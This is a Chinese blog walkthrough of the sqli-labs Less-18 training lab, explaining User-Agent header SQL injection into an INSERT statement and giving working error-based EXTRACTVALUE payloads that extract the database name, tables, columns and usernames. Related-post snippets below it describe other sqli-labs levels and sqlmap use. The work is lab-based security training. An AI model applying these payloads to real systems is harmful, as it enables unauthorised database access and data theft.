sqli-labs Less18 原理到实现详解

最新推荐文章于 2024-08-31 15:20:56 发布
最新推荐文章于 2024-08-31 15:20:56 发布
阅读量810 收藏 7
点赞数 1
分类专栏: web安全 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_60829468/article/details/120946081
版权

目录

前期知识储备

一、初始思路

1.思路

2.user agent后加入',发现出现sql错误日志。

3.我尝试了之前用的各种闭合方法,都已失败告终。

4.新的问题。

5. 现在想的是如何利用mysql插入语句insert实现注入。

​​

 

前期知识储备

从18关开始考察的是头部注入(Header Injection - Uagent field - Error based),这里简述头部注入的点。

  • HTTP Referer是header的一部分,当浏览器向web服务器发送请求的时候,一般会带上Referer,告诉服务器我是从哪个页面链接过来的,服务器基此可以获得一些信息用于处理。
  • X-Forwarded-For:简称XFF头,它代表客户端,用于记录代理信息的,每经过一级代理(匿名代理除外),代理服务器都会把这次请求的来源IP追加在X-Forwarded-For中。
  • Cookie,有时也用其复数形式 Cookies,指某些网站为了辨别用户身份、进行 session 跟踪而储存在用户本地终端上的数据(通常经过加密)。
  • X-Real-IP一般只记录真实发出请求的客户端IP。
  • Accept Language请求头允许客户端声明它可以理解的自然语言,以及优先选择的区域方言。
  •  User Agent中文名为用户代理,简称 UA,它是一个特殊字符串头,使得服务器能够识别客户使用的操作系统及版本、CPU 类型、浏览器及版本、浏览器渲染引擎、浏览器语言、浏览器插件等。
  • Accept代表客户端希望接受的数据类型,数据类型中的先后次序表示客户端接受的先后次序。
  • Referer表示一个来源,当浏览器向web服务器发送请求的时候,一般会带上Referer,告诉服务器我是从那个页面链接过来的,服务器借此可以获得一些信息用于处理。Referer用于所有类型的请求。

提示:以下是本篇文章正文内容,下面案例可供参考




一、初始思路

1.思路

在第一次接触18关的时候有点懵,感觉一切都很熟悉但是又不是那么的熟悉。当我随意输入用户名和密码看到它可以显示我的ip和user agent信息。那就能够证明它读取了我的user agent。尝试对useragent下手。

2.user agent后加入',发现出现sql错误日志。

3.我尝试了之前用的各种闭合方法,都已失败告终。

' #
" #
'" #
')
")
'))
"))
'")
'"))

4.新的问题。

我当时直观感受就是之前用到的sql语句和现在不一样了,十多关的靶场还没有过滤规则,完全没办法直接看源码。

5. 现在想的是如何利用mysql插入语句insert实现注入。

1. 将源码中的语句直接复制到navicat中,我们只换值运行语句,观察结果。 



2.从上边发现我们注入的语句值被当作插入值中的第一个值被执行。那就先闭合引号看看会产生什么样的结果。

3.直接报错,根据错误提可能是123被当作字符优先匹配他周围的引号为一组,结果就剩下前后两个未被闭合的单引号导致出错。证明如下图:

 这张图证明我们的思路是正确的

 4.那么我们把中间的字符删掉看看会发生什么,结果如下图:


 语句执行成功,空字符串被成功写入。

 5.那么能够利用的点肯定在这个空白区域,我试过用 and updatexml()和and extractvalue() 都已失败告终。看了看大神的文章我才知道这里需要用到两个and或者两个or。

INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('' and 1=1 and '', '456',789 )

 没问题可以执行,那么把需要的语句放进去试试。

 6.赶紧抓包试一试。。。。。。。。

User-Agent: 'and EXTRACTVALUE(1,CONCAT(0x7e,database(),0x7e)) and'

 一切都熟悉了爆表名

User-Agent: 'and EXTRACTVALUE(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x7e)) and'

 

 列名

User-Agent: 'and EXTRACTVALUE(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 1,1),0x7e)) and'

 数据

User-Agent: 'and EXTRACTVALUE(1,concat(0x7e,(select username from users limit 1,1),0x7e)) and'

m0_60829468
关注
专栏目录
sqli-labs Less-18
qq_42630215的博客
05-04 837
LESS-18 POST - Header Injection -Uagent field - Error based 0x01. 随便测试几个查看有无回显 错误回显和正确回显都是显示IP地址 错误回显: 正确回显: 在正确的回显中可以看见user agent,猜测可以利用进行注入,可以查看源码进行分析。 用户名与密码的获取方式是post,而且采用了check_input处理,所以在这两个地...
Sqli-labs靶场第18详解[Sqli-labs-less-18]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 1338
所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。尝试加上注入语句(报错注入),测试是否会执行并返回报错语句爆出想要的信息。使用单引号' 测试得到了报错即: ' 为闭合方式。在user-agent处加上*代表注入点。
SQLi LABS Less-18 报错注入
热门推荐
wangyuxiang946的博客
06-22 1万+
第十八关请求方式为 GET请求 , 注入点为User-Agent , 注入方式为 错误注入 第一步,判断注入方式 先看源码 后台代码对 特殊字符进行了过滤 , 常规的注入方式行不通 , 只有通过代码审计来判断注入方式 登录成功后 , 有一个保存用户主机信息的SQL语句 , 并且没有对参数进行过滤 , 我们可以针对这个SQL进行错误注入 真实场景中 , 我们可以先注册一个账号进行登录 , 登录成功后通过User-Agent 进行错误注入 , 从而实现脱库 使用 Burp...
Sqli-labs(1到18关)
最新发布
qq_61740845的博客
08-31 846
通过id=1'判断他url出存在注点闭合方式为单引号使用and1=2判断他使用数字注入通过id=1' order by 4 -- - 判断它可以回显三列通过id=0' union select 1,2,3 -- -判断只有2,3位可以回显。
sqli-labs(less-18)
m0_64849639的博客
08-02 844
less-18关于uagent注入
sqli-labs ————less -18
Fly_鹏程万里
05-12 3823
Less-18源代码:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head&gt..
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1557
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
Sqli-labs靶场第9关详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 2028
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间型盲注(Time-based blind)
Sqli-labs靶场第16关详解[Sqli-labs-less-16]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 845
-batch当你需要以批处理模式运行 sqlmap,避免任何用户干预 sqlmap 的运行,可以强制使用--batch这个开关。这样,当 sqlmap 需要用户输入信息时,都将会以默认参数运行。由于这题是,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件爆出当前主机名称。
Sqli-labs靶场第12关详解[Sqli-labs-less-12]
m0_73615178的博客
03-02 828
所以,payload分析输入一个username值然后使用单引号加小括号 ") 闭合前面的语句,然后为了使where语句条件成立,加上一个or 1=1 ,-- 注释语句使后面的语句直接注释password不用判断。由于这题是post请求,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。根据题目看,像一个登录页面,尝试使用布尔型盲注测试能否登录网站。输入:-admin") union select 1,2--爆出当前数据库名称及当前用户名。
sqli-labs less18
qq_45106794的博客
10-24 436
sqli-labs less 18 reader-l ‘or updatexml(1,concat(’#’,(select user()),1),1) 先用这句话简单的判断后台insert 语句 insert="INSERTINTOsecurity.uagents(uagent,ipaddress,username)VALUES(′insert="INSERT INTO security.uage...
sqli-labs/Less-18
m0_71299382的博客
11-18 189
sqli-labs/第十八关
Sqli-labs之Less-18和Less-19
→_→
04-12 3543
Less-18 基于错误的用户代理,头部POST注入 (注:这一个模拟的场景是注册登录后的注入) 由题意可知,这又是一种新姿势,老方法,查找注入点,发现前面的方法都未成功。且错误回显与正确回显都显示IP: 这里写说几个常用请求头:(上一篇文章详细讲过) Host ...
sqli-labs (less-18)
kukudeshuo的博客
03-11 1067
sqli-labs (less-18) 进入18关,输入用户名和密码以后,我们发现屏幕上回显了我们的IP地址和我们的User Agent 用hackbar抓取POST包,在用户名和密码的位置判断注入点,这里我试了很久,发现用户名和密码的位置都是没有注入点的,那是不是代表这关不存在SQL注入漏洞呢,我们注意到一个特点,页面回显了我们的User Agent,所以我们猜想可能注入点在User Agent这里 想抓取到User Agent,可以利用火狐插件或者使用burpsuite抓包,这里演示利用burpsui
sqli- labs - Less 18
m0_62102000的博客
08-11 257
sqli- labs - Less 18
sqli-labs (less18-less19)
Xi4or0uji
08-01 1725
less 18 头部注入:user_agent 这里不补充http头的知识了,直接看源码可以看到,uname和passwd都有check_input函数检查,所以直接这两个参数注入是不行的了,然后再继续看下去 有句sql语句有ip_address和uagent两个参数,而且前面没有检查,可以考虑注入,但是ip一般是数字,比较麻烦,所以决定用uagent注入 这里给个脚本,其实重点只是s...
sqli-labs靶场题解(less 1-18
ph0ebus的博客
03-07 680
入门sql注入
SQL注入 Less18(头部注入+报错注入)
开心星人的博客
07-24 809
_SERVER是PHP预定义变量之一,可以直接使用,它是一个包含了诸如头信息(header)、路径(path)及脚本位置(scriptlocations)信息的数组。$_SERVER数组中的元素由Web服务器创建,但不能保证每个服务器都提供全部元素,有的服务器可能会忽略一些,或者提供一些没有在这里列举出来的元素。一个select查询语句,因为必须要$row1不为空,才可以进入下面的if,所以我们输入的uname和passwd都必须是正确存在的用户。check_input函数,...
sqli-labs less
07-28
抱歉,我无法回答关于sqli-labs less的问题。 #### 引用[.reference_title] - *1* *2* *3* [sqli-labs教程——Less 1-10](https://blog.csdn.net/qq_25649867/article/details/111020393)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值